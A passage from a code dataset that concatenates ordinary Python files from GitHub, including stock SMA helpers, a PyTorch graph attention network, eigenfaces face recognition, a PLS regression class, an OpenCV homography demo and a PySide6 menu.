get_Dataset_IntraDay(api, stock_obj, 1400, \"15min\")\n #initialize_trend_data(stock_obj, \"15min\", dataset_15min)\n #stock_obj.determine_ititial_trend()\n\n #5 Min Datatset\n #for stock_obj in group.stock_objects_array:\n\n #dataset_5min = get_Dataset_IntraDay(api, stock_obj, 1400, \"5min\")\n #initialize_trend_data(stock_obj, \"5min\", dataset_5min)\n #stock_obj.determine_ititial_trend()\n\n ###############################################################################\n ##### END ################################################\n\n#calculate SMAS\ndef get_sma_health(api, group_name):\n DATA_PERIOD_DAY = int((200 *(8/5)) + 10)\n\n #Get Daily data\n for name in group_name.stock_objects_array:\n dataset_daily = get_Dataset_D(api, name, DATA_PERIOD_DAY)\n\n #Get 200 SMA on Daily\n sma_200 = sma(dataset_daily, 200, name.name)\n\n #Get 50 SMA on Daily\n sma_50 = sma(dataset_daily, 50, name.name)\n\n #Store SMA attributes in stock object\n name.SMA_200 = sma_200\n name.SMA_50 = sma_50\n \n\ndef sma(data, length_sma , stock_name):\n\n current_sma = None\n length_data_set = len(data)\n start_index = length_data_set - length_sma\n \n #Compute SMA\n total = 0 \n try:\n for i in range(start_index, length_data_set):\n total = total + data[i]\n current_sma = round(total / length_sma, 2) \n\n except:\n temp_error = \"SMA can not be computed for: \" + stock_name\n logging.error(temp_error)\n\n return current_sma","repo_name":"tbaranoski/Trading_Quant","sub_path":"market_health.py","file_name":"market_health.py","file_ext":"py","file_size_in_byte":26007,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"31650021925","text":"import torch\r\nfrom torch import nn\r\nfrom layers import GraphAttentionLayer\r\nfrom torch.nn import functional as F\r\n\r\n\r\nclass GAT(nn.Module):\r\n def __init__(self, in_size, hid_size, num_class, dropout, alpha, num_head):\r\n super(GAT, self).__init__()\r\n self.dropout = dropout\r\n\r\n self.attentions = list()\r\n for _ in range(num_head):\r\n self.attentions.append(GraphAttentionLayer(in_size, hid_size, dropout, alpha, concat=True))\r\n\r\n for i, attention in enumerate(self.attentions):\r\n self.add_module('attention_{}'.format(i), attention)\r\n\r\n self.out_att = GraphAttentionLayer(hid_size * num_head, num_class, dropout, alpha, concat=False)\r\n\r\n def forward(self, x, adj):\r\n x = F.dropout(x, self.dropout, training=self.training)\r\n x_list = list()\r\n for att in self.attentions:\r\n x_list.append(att(x, adj))\r\n x = torch.cat(x_list, dim=1)\r\n x = F.dropout(x, self.dropout, training=self.training)\r\n x = F.elu(self.out_att(x, adj))\r\n return F.log_softmax(x, dim=1)\r\n","repo_name":"PreckLi/Pytorch_GAT","sub_path":"Pytorch_GAT/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7804866694","text":"import logging\nimport datetime as dt\n\nfrom app.models import db, Translations\n\n\ndef add_translation(query_text, query_language, translated_text, translated_language, provider):\n try:\n translation = Translations(\n query_text=query_text, query_language=query_language,\n translated_text=translated_text, translated_language=translated_language,\n provider=provider, date_created=dt.datetime.now()\n )\n db.session.add(translation)\n db.session.commit()\n except Exception as e:\n logging.error(e)\n db.session.rollback()\n return 
None\n","repo_name":"AleksandrFrolov/BackofficeSS","sub_path":"app/models/translation_queries.py","file_name":"translation_queries.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34683109903","text":"import string\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.feature_selection import SelectKBest\r\nfrom sklearn.feature_selection import f_classif\r\n\r\nNGRAM_RANGE = (1, 3)\r\n\r\nTOP_K = 7500\r\n\r\nTOKEN_MODE = 'word'\r\n\r\nMIN_DOCUMENT_FREQUENCY = 5\r\n\r\ndef ngram_vectorize(train_texts, train_labels, val_texts, return_models = False):\r\n\r\n kwargs = {\r\n 'ngram_range': NGRAM_RANGE,\r\n 'dtype': np.float32, \r\n 'strip_accents': 'unicode',\r\n 'decode_error': 'replace',\r\n 'analyzer': TOKEN_MODE, \r\n 'min_df': MIN_DOCUMENT_FREQUENCY,\r\n }\r\n vectorizer = TfidfVectorizer(**kwargs)\r\n\r\n x_train = vectorizer.fit_transform(train_texts)\r\n\r\n x_val = vectorizer.transform(val_texts)\r\n\r\n selector = SelectKBest(f_classif, k=min(TOP_K, x_train.shape[1]))\r\n selector.fit(x_train, train_labels)\r\n x_train = selector.transform(x_train).astype(np.float32)\r\n x_val = selector.transform(x_val).astype(np.float32)\r\n\r\n x_train = x_train.toarray()\r\n x_val = x_val.toarray()\r\n\r\n if return_models:\r\n return x_train, x_val, vectorizer, selector\r\n else:\r\n return x_train, x_val\r\n\r\ndef vectorize(data, vectorizer, selector):\r\n data = vectorizer.transform(data)\r\n data = selector.transform(data).astype(np.float32)\r\n return data.toarray()\r\n\r\ndef meta_features(data, STOPWORDS):\r\n # word_count\r\n data['Całkowita ilość słów'] = data['text'].apply(lambda x: len(str(x).split()))\r\n data['Ilość słów bez powtórzeń'] = data['text'].apply(lambda x: len(set(str(x).split())))\r\n\r\n # stop_word_count\r\n data['Ilość stop-słów'] = data['text'].apply(lambda x: len([w for w in str(x).lower().split() if w in STOPWORDS]))\r\n\r\n # mean_word_length\r\n data['Średnia długość słowa'] = data['text'].apply(lambda x: np.mean([len(w) for w in str(x).split()]))\r\n\r\n # char_count\r\n data['Ilość symboli'] = data['text'].apply(lambda x: len(str(x)))\r\n\r\n # punctuation_count\r\n data['Ilość znaków interpunkcyjnych'] = data['text'].apply(lambda x: len([c for c in str(x) if c in string.punctuation]))\r\n return data\r\n\r\n\r\ndef vectorize_dataset(configuration, df):\r\n METAFEATURES = configuration.METAFEATURES\r\n df_train, df_test = train_test_split(df, test_size=0.1)\r\n scaler = StandardScaler()\r\n meta_train = scaler.fit_transform(df_train[METAFEATURES])\r\n meta_test = scaler.transform(df_test[METAFEATURES])\r\n train_x = df_train.drop(columns=['label'])\r\n train_y = df_train['label']\r\n\r\n test_x = df_test.drop(columns=['label'])\r\n test_y = df_test['label']\r\n\r\n text_train, text_test, vectorizer, selector = ngram_vectorize(train_x['clean_text'], train_y, test_x['clean_text'], return_models=True)\r\n train_ngram_x = np.concatenate([text_train, meta_train], axis=1)\r\n test_ngram_x = np.concatenate([text_test, meta_test], axis=1)\r\n return train_ngram_x, train_y, test_ngram_x, test_y, scaler, vectorizer, selector\r\n\r\ndef preprocess(configuration, df):\r\n STOPWORDS = configuration.STOPWORDS\r\n df = meta_features(df, STOPWORDS)\r\n \r\n try:\r\n df['year'] = df.date.dt.year.astype(str)\r\n 
except:\r\n df['year'] = 'None'\r\n\r\n return df","repo_name":"pSzyc/Climate","sub_path":"Classification/resources/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72337293265","text":"# import the necessary packages\nimport glob\nimport numpy as np\nimport cv2\n\nfrom matplotlib import pyplot as plt\nimport os\n# construct the argument parser and parse the arguments\ndata_path = \"C:/Users/maiho/PycharmProjects/DPT/database/Face_Detected\"\nindexed_path = \"C:/Users/maiho/PycharmProjects/DPT/Face_Recog/index.csv\"\n\n\n\nface_vector = []\nimage_width = 240\nimage_length = 360\ntotal_pixels = image_width*image_length\n\n\nfor imagePath in glob.glob(data_path + \"/*.jpg\"):\n face_image = cv2.cvtColor(cv2.imread(imagePath), cv2.COLOR_RGB2GRAY)\n\n face_image = cv2.resize(face_image, (240, 360))\n # cv2.imshow(\"a\",face_image)\n # cv2.waitKey(0)\n # plt.imshow(face_image, cmap = 'gray', interpolation = 'bicubic')\n # plt.show()\n face_image = face_image.reshape(total_pixels, )\n face_vector.append(face_image)\n\nface_vector = np.asarray(face_vector)\n\nface_vector = face_vector.transpose()\n\n\n#STEP2: Normalize the face vectors by calculating the average face vector and subtracting it from each vector\navg_face_vector = face_vector.mean(axis=1)\n\navg_face_vector = avg_face_vector.reshape(face_vector.shape[0], 1)\nnormalized_face_vector = face_vector - avg_face_vector\nprint(normalized_face_vector)\n\n#STEP3: Calculate the Covariance Matrix or the Sigma\ncovariance_matrix = np.cov(np.transpose(normalized_face_vector))\n# covariance_matrix = np.transpose(normalized_face_vector).dot(normalized_face_vector)\nprint(covariance_matrix)\n\n# STEP4: Calculate Eigen Vectors\neigen_values, eigen_vectors = np.linalg.eig(covariance_matrix)\n\n# STEP5: Select the K best Eigen Faces, K < M\nprint(eigen_vectors.shape)\nk = 30\nk_eigen_vectors = eigen_vectors[0:k, :]\nprint(k_eigen_vectors.shape)\n\n#STEP6: Convert lower dimensionality K Eigen Vectors to Original Dimensionality\neigen_faces = k_eigen_vectors.dot(np.transpose(normalized_face_vector))\nprint(eigen_faces.shape)\n\n# STEP7: Represent Each eigen face as combination of the K Eigen Vectors\n# weights = eigen_faces.dot(normalized_face_vector)\nweights = np.transpose(normalized_face_vector).dot(np.transpose(eigen_faces))\nprint(weights[1])\n\n# STEP8: Testing Phase\ntest_add = \"C:/Users/maiho/PycharmProjects/DPT/Face_Recog/s50_15.jpg\"\ntest_img = cv2.imread(test_add)\ntest_img = cv2.cvtColor(test_img, cv2.COLOR_RGB2GRAY)\ntest_img = cv2.resize(test_img, (240, 360))\ntest_img = test_img.reshape(total_pixels, 1)\n\ntest_normalized_face_vector = test_img - avg_face_vector\ntest_weight = np.transpose(test_normalized_face_vector).dot(np.transpose(eigen_faces))\nprint(test_weight.shape)\nindex = np.argmin(np.linalg.norm(test_weight - weights, axis=1))\n# print(\"------------------\")\n# print(weights[345])\nprint(index)\nfor i,imagePath in enumerate(glob.glob(data_path + \"/*.jpg\")):\n if(i==index):\n result = cv2.imread(imagePath)\n result = cv2.resize(result, (256, 256))\n cv2.imshow(\"Result\", result)\n cv2.waitKey(0)\n","repo_name":"thangnvkcn/MultimediaDatabaseAssignment","sub_path":"Face_Recognition_usingPCA/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
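The eigenfaces script above repeats the load/normalize/project/argmin steps inline for its test image; the sketch below (an added illustration, not part of the original repository) wraps that recognition step into one reusable function. `avg_face_vector`, `eigen_faces`, and `weights` are assumed to be the arrays computed by the preceding script, and the 240x360 image size is assumed to match it.

import cv2
import numpy as np

def recognize(test_path, avg_face_vector, eigen_faces, weights):
    # Load, grayscale, and resize the probe image exactly like the gallery images
    img = cv2.cvtColor(cv2.imread(test_path), cv2.COLOR_RGB2GRAY)
    img = cv2.resize(img, (240, 360)).reshape(-1, 1)
    # Subtract the mean face and project onto the eigenface basis
    test_weight = np.transpose(img - avg_face_vector).dot(np.transpose(eigen_faces))
    # The nearest neighbour in weight space is the predicted identity (gallery index)
    return np.argmin(np.linalg.norm(test_weight - weights, axis=1))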
+{"seq_id":"9327202253","text":"#[Easy]Challenge_13.py\n'''Find the number of the day of the year for the given date.\nFor example, January 1st would be 1, and December 31st\nis 365.\nFor extra credit, allow it to calculate leap years,\nas well.\n'''\n# Ugly code :(\nimport sys\nmnth = (31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31)\n\ndef dayNum(day, month, leap):\n\tif month == 1:\n\t\treturn day\n\telif leap == 'y':\n\t\tif(month == 2 and day <= 28):\n\t\t\treturn((sum(mnth[:month-1])) + day)\n\t\telse:\n\t\t\treturn((sum(mnth[:month-1])) + day + 1)\n\telse:\n\t\treturn((sum(mnth[:month-1])) + day)\n\nday = int(input(\"Day(dd): \"))\nif(day > 31 or day < 1):\n\tprint(\"Invalid Day Choice. Pick a number between 1 - 31.\")\n\tsys.exit()\nmonth = int(input(\"Month(mm): \"))\nif(month > 12 or month < 1):\n\tprint(\"Invalid Month Choice. Pick a number between 1 - 12.\")\n\tsys.exit()\nleap = input(\"Is it a leap year? (y or n): \")\nif(leap == 'y' or leap == 'n'):\n\tprint(dayNum(day, month, leap))\nelse:\n\tprint(\"Invalid choice. Use either y or n.\")\n\tsys.exit()","repo_name":"TheWhiteCrayon/DailyProgrammer","sub_path":"[Easy]Challenge_13.py","file_name":"[Easy]Challenge_13.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
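A quick cross-check for the day-of-year record above, using only the Python standard library (an added illustration, not part of the challenge file): date.timetuple().tm_yday yields the ordinal day directly, leap-year handling included.

from datetime import date

def day_of_year(day, month, year=2001):
    # Pick any leap year (e.g. 2000) to reproduce the leap-year branch
    return date(year, month, day).timetuple().tm_yday

print(day_of_year(31, 12))       # 365
print(day_of_year(29, 2, 2000))  # 60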
+{"seq_id":"5931540015","text":"\"\"\"\nTest Flask module for research guides\n\n\"\"\"\nfrom flask import Blueprint\nfrom flask import request, render_template, redirect\nfrom ..common import util\n\nRESEARCHGUIDES = Blueprint('researchguides', __name__)\n\nWEBROOT = '/var/www/html/tlaservice-web'\n\nSAKAIDBNAME = util.CONFIG['app']['sakaidb']\nDBCONFIG = util.CONFIG[SAKAIDBNAME]\n\nRGURLHTTPS = 'https://www1.wjchen.org/sec-cgi-bin/cul/rschloc/rschloc?key='\nRGURLHTTP = 'http://www.wjchen.org/cgi-bin/cul/rschloc?key='\n\ndef rgurl(cid):\n \"\"\"\n Retrieve school and department from the database and generate a\n URL for the library redirect script\n\n \"\"\"\n conn = util.dbconnect(DBCONFIG)\n curr = conn.cursor()\n\n param = {'https': False}\n queryparameters = {\n 'site_id': cid\n }\n query = \"SELECT SIS_DEPARTMENT, SIS_SCHOOL \\\nFROM CU_COURSE_SITE \\\nWHERE SITE_ID = :site_id\"\n results = curr.execute(query, queryparameters).fetchall()\n if curr.rowcount > 0:\n param['url'] = RGURLHTTP + cid + '&dept=' + results[0][0] \\\n + '&sch=' + results[0][1]\n else:\n param['url'] = RGURLHTTP + cid\n\n curr.close()\n conn.close()\n return param\n\n@RESEARCHGUIDES.route('/launch', methods=['GET', 'POST'])\ndef frame():\n \"\"\"\n This extracts the course ID from the LTI parameters and passes it\n to rgurl() to get the URL for the library redirect script. The\n research guides do not have a Columbia HTTPS URL, so the tool\n generates a small HTML page that opens the research guide in a new\n window.\n \"\"\"\n param = {\n 'debug': False,\n 'https': False\n }\n\n if 'lis_course_offering_sourcedid' in request.form:\n param.update(rgurl(request.form['lis_course_offering_sourcedid']))\n else:\n param['error'] = \"There was no course ID specified.\"\n\n if param['https'] and not param['debug']:\n return redirect(param['url'], code=302)\n else:\n return render_template('redirect.html', param=param)\n\nif __name__ == \"__main__\":\n print('This requires Flask and Blueprint')\n","repo_name":"wjchen01/clti","sub_path":"canvastools/views/researchguides.py","file_name":"researchguides.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25654652215","text":"from collections import deque\n\n\ndef solve():\n N = int(input())\n S = input()\n ans = deque(S)\n \n l, r = 0, 0\n for i in range(N):\n if S[i] == '(':\n l += 1\n else:\n if 0 < l:\n l -= 1\n else:\n r += 1\n \n for _ in range(l):\n ans.append(')')\n for _ in range(r):\n ans.appendleft('(')\n print(''.join(ans))\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"yuly3/atcoder","sub_path":"ABC/ABC064/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1966918486","text":"def solve1(ipt, print_result=True, **kwargs):\n ipt = [int(i) for i in ipt]\n step = 5 if kwargs.get('is_test') else 25\n\n invalid = 0\n for i in range(step, len(ipt)):\n target = ipt[i]\n seen = set()\n valid = False\n\n for j in range(i-step, i):\n candidate = ipt[j]\n\n if target - candidate in seen and target != target - candidate:\n valid = True\n break\n else:\n seen.add(candidate)\n\n if not valid:\n invalid = target\n\n if print_result:\n print(target)\n\n return invalid\n\ndef solve2(ipt, **kwargs):\n invalid = solve1(ipt, False, **kwargs)\n ipt = [int(i) for i in ipt]\n\n for i in range(len(ipt)):\n total = ipt[i]\n ran = [ipt[i]]\n for j in range(i+1, len(ipt)):\n ran.append(ipt[j])\n total += ipt[j]\n\n if total == invalid:\n print((min(ran) + max(ran)))\n return\n elif total > invalid:\n break","repo_name":"Perfect5th/aoc-2020","sub_path":"day9/soln.py","file_name":"soln.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19086901540","text":"from sklearn.model_selection import cross_val_predict, LeaveOneOut, train_test_split, GridSearchCV\nfrom sklearn.cross_decomposition import PLSRegression\nfrom sklearn.metrics import mean_squared_error\nfrom utils import external_validation, cross_validation\n\nimport pandas as pd\nimport numpy as np\n\nclass PLSR():\n \"\"\"\n This class receives a pandas DataFrame and some params for performing a PLS regression.\n \n The params are:\n - components: number of components in the PLS regression\n - cross_validation_type: type of cross-validation that will be performed. Pass an int to use the\n k-fold strategy and 'loo' to use the leave-one-out strategy. Default is 'loo'.\n - split_for_validation: should be a float between 0 and 1. 
If informed, this represents the fraction of the\n dataset that will be used as test samples.\n - dataset_validation: If informed, should be a DataFrame with samples that will be used to validate the model\n - scale: if true, then the data is scaled\n - plsr_random_state: the seed for the random number generator. It is used to split the dataset\n \n If split_for_validation and dataset_validation are both informed, then only dataset_validation is considered.\n \"\"\"\n\n def __init__(self, dataset, components=2, cross_validation_type='loo', split_for_validation=None, dataset_validation=None, scale=False, plsr_random_state=123):\n self.dataset = dataset\n self.components = components\n self.cross_validation_type = cross_validation_type\n self.split_for_validation = split_for_validation\n self.dataset_validation = dataset_validation\n self.scaleOpt = scale\n self.plsr_random_state = plsr_random_state\n\n self._xCal = pd.DataFrame()\n self._xVal = pd.DataFrame()\n self._yCal = pd.DataFrame()\n self._yVal = pd.DataFrame()\n\n self._cv = None\n\n self.metrics = {}\n\n # checking if the parameters were provided correctly\n\n if not isinstance(self.dataset, pd.DataFrame):\n raise ValueError('The dataset should be a pd.DataFrame.')\n\n if type(self.components) not in [int]:\n raise ValueError('components should be an integer')\n\n if (self.dataset_validation is None) and (self.split_for_validation is None):\n raise ValueError('Either validation samples or a test split size must be defined.')\n \n if (not self.split_for_validation is None) and (self.dataset_validation is None):\n if self.split_for_validation == 'all':\n self._xCal = self.dataset.iloc[:, 2:]\n self._yCal = self.dataset.iloc[:, 1]\n elif isinstance(self.split_for_validation, float):\n self._xCal, self._xVal, self._yCal, self._yVal = train_test_split(self.dataset.iloc[:, 2:], self.dataset.iloc[:, 1], test_size=split_for_validation, random_state=self.plsr_random_state)\n else:\n raise ValueError(\"split_for_validation must be a float between 0 and 1 to split the dataset. 
Use 'all' to calibrate with all samples of the dataset.\")\n\n if not self.dataset_validation is None:\n if isinstance(self.dataset_validation, pd.DataFrame):\n self._xCal = self.dataset.iloc[:, 2:]\n self._yCal = self.dataset.iloc[:, 1]\n self._xVal = self.dataset_validation.iloc[:, 2:]\n self._yVal = self.dataset_validation.iloc[:, 1]\n else:\n raise ValueError(\"dataset_validation must be a pd.DataFrame\")\n\n\n if isinstance(cross_validation_type, str):\n if cross_validation_type == \"loo\":\n self._cv = LeaveOneOut()\n elif (type(cross_validation_type) in [int]) and (cross_validation_type > 0):\n self._cv = cross_validation_type\n else:\n raise ValueError(\"The cross_validation_type should be a positive integer for the k-fold method or 'loo' for leave-one-out cross-validation.\")\n\n if self.scaleOpt not in [True, False]:\n raise ValueError('The scale option should be a boolean.')\n \n def search_hyperparameters(self, components=[1, 21], n_processors=1, verbose=0, scoring='neg_root_mean_squared_error'):\n \n step_value = lambda list_of_values: 1 if (len(list_of_values) < 3) else list_of_values[2]\n components = np.arange(start = components[0], stop = components[1], step = step_value(components))\n \n grid = { \"n_components\": components }\n\n pls = PLSRegression(scale=self.scaleOpt)\n pls_grid_search = GridSearchCV(estimator = pls, param_grid = grid, cv = self._cv, n_jobs = n_processors, verbose=verbose, scoring=scoring)\n\n pls_grid_search.fit(self._xCal, self._yCal)\n\n get_params = lambda dict_params, param, default_params: dict_params[param] if (param in dict_params) else default_params\n \n self._best_params = pls_grid_search.best_params_\n self.components = get_params(pls_grid_search.best_params_, 'n_components', self.components)\n \n \n def calibrate(self):\n \"\"\"\n runs the PLSR model with an instance of PLSRegression from sklearn\n \"\"\" \n\n self.model = PLSRegression(n_components=self.components, scale=self.scaleOpt)\n self.model.fit(self._xCal, self._yCal)\n\n y_cal_predict = self.model.predict(self._xCal)\n y_cal_predict = [i[0] for i in y_cal_predict]\n \n r_correlation = np.corrcoef(y_cal_predict, self._yCal)[0][1]\n \n r2_cal = self.model.score(self._xCal, self._yCal)\n\n rmse = mean_squared_error(self._yCal, y_cal_predict, squared=False)\n\n nsamples = self._xCal.shape[0]\n\n calibration_metrics = {'n_samples': nsamples, 'R': r_correlation, 'R2': r2_cal, 'RMSE': rmse}\n\n self.metrics['calibration'] = calibration_metrics \n \n \n def cross_validate(self):\n \n r_correlation, r2_cv, rmse_cv, bias, predicted_values = cross_validation(self.model, self._xCal, self._yCal, cv=self._cv)\n\n method = 'LOO'\n if isinstance(self._cv, int):\n method = \"{}-fold\".format(self._cv)\n\n cross_validation_metrics = {'R': r_correlation, 'R2': r2_cv, 'RMSE': rmse_cv, 'bias': bias, 'method': method, 'predicted_values': predicted_values }\n\n self.metrics['cross_validation'] = cross_validation_metrics\n \n\n def validate(self):\n\n r_correlation, r2_ve, rmse_ve, bias, predicted_values = external_validation(self.model, self._xVal, self._yVal)\n\n nsamples = self._xVal.shape[0]\n validation = {'R': r_correlation, 'R2': r2_ve, 'RMSE': rmse_ve, 'bias': bias, 'n_samples': nsamples, 'predicted_values': predicted_values}\n\n self.metrics['validation'] = validation\n \n\n def get_coefs(self, get_intercept=False):\n \n # Returns an array with coefficients. 
If the get_intercept flag is True, the intercept is calculated\n # and inserted into the coefs array at index 0\n \n coefs = np.array([coef[0] for coef in self.model.coef_])\n if get_intercept == True:\n self.model._intercept = self.model.y_mean_ - np.dot(self.model.x_mean_, self.model.coef_)\n coefs = np.insert(coefs, 0, self.model._intercept) \n\n return coefs\n \n def test_many_components(self, components=[1,20], target='cv'):\n\n if not isinstance(components, list):\n raise ValueError('components should be a list of integers.')\n\n step_value = lambda list_of_values: 1 if (len(list_of_values) < 3) else list_of_values[2]\n components_for_test = [int(x) for x in np.arange(start=components[0], stop=components[1], step=step_value(components))]\n\n rmse_cv = []\n r2_cv = []\n rmse_ve = []\n r2_ve = []\n default = self.components\n\n for comp in components_for_test:\n\n self.components = comp\n\n if target=='cv':\n self.calibrate()\n self.cross_validate()\n rmse_cv.append(self.metrics['cross_validation']['RMSE'])\n r2_cv.append(self.metrics['cross_validation']['R2'])\n elif target=='pred':\n self.create_model()\n rmse_cv.append(self.metrics['cross_validation']['RMSE'])\n r2_cv.append(self.metrics['cross_validation']['R2'])\n rmse_ve.append(self.metrics['validation']['RMSE'])\n r2_ve.append(self.metrics['validation']['R2'])\n else:\n raise ValueError(\"target should be 'cv' or 'pred'.\")\n \n self.components = default\n cross_validation = {'RMSE': rmse_cv, 'R2': r2_cv}\n\n \n if target == 'pred':\n validation = {'RMSE': rmse_ve, 'R2': r2_ve}\n performance = {'cross_validation': cross_validation, 'validation': validation, 'components': components_for_test }\n \n else:\n performance = {'cross_validation': cross_validation, 'components': components_for_test }\n\n\n self._perfomance = performance\n \n \n \n def create_model(self):\n \n # this function should be used to calibrate, cross-validate and validate with one command\n\n self.calibrate()\n self.cross_validate()\n self.validate()\n\n","repo_name":"dijsilva/spectroscopy-analysis-tool","sub_path":"algorithms/regression/plsr.py","file_name":"plsr.py","file_ext":"py","file_size_in_byte":9369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"24799842840","text":"import cv2 as cv \nimport numpy as np \nimport matplotlib.pyplot as plt \n\nimg1 = cv.imread(\"pic/box.png\", cv.IMREAD_COLOR)\nimg2 = cv.imread(\"pic/box_in_scene.png\", cv.IMREAD_COLOR)\n\nimg1_gray = cv.cvtColor(img1, cv.COLOR_BGR2GRAY)\nimg2_gray = cv.cvtColor(img2, cv.COLOR_BGR2GRAY)\n\nsurf = cv.xfeatures2d.SURF_create(400)\n\nkp1, des1 = surf.detectAndCompute(img1_gray, None)\nkp2, des2 = surf.detectAndCompute(img2_gray, None)\n\nFLANN_INDEX_KDTREE = 1\nindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\nsearch_params = dict(checks = 50)\nflann = cv.FlannBasedMatcher(index_params, search_params)\n\nmatches = flann.knnMatch(des1, des2, k = 2)\ngood = []\nfor m, n in matches:\n if m.distance < 0.7 * n.distance:\n good.append(m)\n\nMIN_MATCH_COUNT = 10\nif len(good) > MIN_MATCH_COUNT:\n # frame1_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n # frame2_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n # M, mask = cv.findHomography(frame1_pts, frame2_pts, cv.RANSAC, 5.0)\n img1_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n img2_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n M, mask = cv.findHomography(img1_pts, img2_pts, 
cv.RANSAC, 5.0)\n rows, cols, ch = img2.shape\n warp = cv.warpPerspective(img1, M, (cols, rows))\n\n sub = cv.absdiff(img2, warp)\n\n plt.subplot(221), plt.title(\"img1\")\n plt.imshow(img1[:, :, [2, 1, 0]])\n\n plt.subplot(222), plt.title(\"img2\")\n plt.imshow(img2[:, :, [2, 1, 0]])\n\n plt.subplot(223), plt.title(\"absdiff\")\n plt.imshow(sub[:, :, [2, 1, 0]])\n\n plt.subplot(224), plt.title(\"warp\")\n plt.imshow(warp[:, :, [2, 1, 0]])\n plt.show()\n\n\n\n","repo_name":"weizy2018/learnopencv","sub_path":"perspective/perspective_transform2.py","file_name":"perspective_transform2.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28949563275","text":"#-*-coding:utf8-*-\nfrom django.contrib import admin\nfrom .models import Category \n# Register your models here.\n\n\nclass CategoryAdmin(admin.ModelAdmin):\n\tlist_display = ('id','name','timestamp')\n\tlist_filter = ['timestamp']\n\tsearch_fields = ['name','id']\n\nadmin.site.register(Category,CategoryAdmin)\n","repo_name":"zhxhdean/insurance","sub_path":"openapi/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73201054546","text":"from UIs.Estado.PesquisaEstado import *\r\nfrom UIs.Cidade.PesquisaCidade import *\r\nfrom UIs.Genero.PesquisaGenero import *\r\nfrom UIs.Artista.PesquisaArtista import *\r\nfrom UIs.TipoEvento.PesquisaTipoEvento import *\r\nfrom UIs.Evento.PesquisaEvento import *\r\nfrom UIs.Preco.PesquisaPreco import *\r\nfrom UIs.Apresentacao.PesquisaApresentacao import *\r\nfrom UIs.TipoDespesa.PesquisaTipoDespesa import *\r\nfrom UIs.Despesa.PesquisaDespesa import *\r\nfrom UIs.Receita.PesquisaReceita import *\r\nfrom UIs.MainMenu_ui import *\r\nfrom PySide6.QtCore import Slot\r\n\r\n\r\nclass MainMenu(QMainWindow):\r\n def __init__(self, parent=None):\r\n super(MainMenu, self).__init__(parent)\r\n\r\n self.ui = Ui_MainWindow()\r\n self.ui.setupUi(self)\r\n\r\n self.ui.actionEstado.triggered.connect(self.exibe_pesquisa_estado)\r\n self.ui.actionCidade.triggered.connect(self.exibe_pesquisa_cidade)\r\n self.ui.actionGenero.triggered.connect(self.exibe_pesquisa_genero)\r\n self.ui.actionArtista.triggered.connect(self.exibe_pesquisa_artista)\r\n self.ui.actionTipoEvento.triggered.connect(self.exibe_pesquisa_tipo_evento)\r\n self.ui.actionEvento.triggered.connect(self.exibe_pesquisa_evento)\r\n self.ui.actionPreco.triggered.connect(self.exibe_pesquisa_preco)\r\n self.ui.actionApresentacao.triggered.connect(self.exibe_pesquisa_apresentacao)\r\n self.ui.actionTipoDespesa.triggered.connect(self.exibe_pesquisa_tipo_despesa)\r\n self.ui.actionDespesa.triggered.connect(self.exibe_pesquisa_despesa)\r\n self.ui.actionReceita.triggered.connect(self.exibe_pesquisa_receita)\r\n\r\n @Slot()\r\n def exibe_pesquisa_estado(self):\r\n self.pesquisa_estado = PesquisaEstado(parent=None)\r\n self.pesquisa_estado.show()\r\n\r\n @Slot()\r\n def exibe_pesquisa_cidade(self):\r\n self.pesquisa_cidade = PesquisaCidade(parent=None)\r\n self.pesquisa_cidade.show()\r\n\r\n @Slot()\r\n def exibe_pesquisa_genero(self):\r\n self.pesquisa_genero = PesquisaGenero(parent=None)\r\n self.pesquisa_genero.show()\r\n\r\n @Slot()\r\n def exibe_pesquisa_artista(self):\r\n self.pesquisa_artista = PesquisaArtista(parent=None)\r\n self.pesquisa_artista.show()\r\n\r\n @Slot()\r\n def exibe_pesquisa_tipo_evento(self):\r\n 
